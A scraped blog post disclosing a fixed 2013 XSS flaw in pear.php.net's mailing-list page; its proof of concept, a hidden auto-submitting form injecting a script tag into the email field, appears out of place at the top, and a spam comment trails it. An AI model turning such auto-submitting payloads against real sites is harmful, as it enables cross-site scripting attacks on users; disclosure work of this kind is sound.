<head> <script src="http://code.jquery.com/jquery-1.10.1.min.js"></script> </head> <body> <form method="post" action="http://pear.php.net/support/lists.php" id="form" style="display:none"> <input name="maillist[pear-dev]" type="radio" value="normal" checked> <input type="text" name="email" size="30" value="<script>alert('xss');</script>"> <input type="submit" name="action" value="Subscribe"> </form> </body> <script> $('input[name=action]').click(); </script>Fixed 08.07.2013.
Monday, April 21, 2014
pear.php.net XSS
Long time ago (28.06.2013) I found XSS bug in http://pear.php.net/support/lists.php. Email parameter was neither validated nor sanitized which resulted in XSS.
Proof of concept was:
Subscribe to:
Post Comments (Atom)
Tamiloneindia is an international online retailer in video games and the preferred choice of millions of gamers across the globe. Download the most recent and best PC games using Tamil One India - get the lowest prices, incredible bundles, and exclusive deals. All that is updated regularly.
ReplyDelete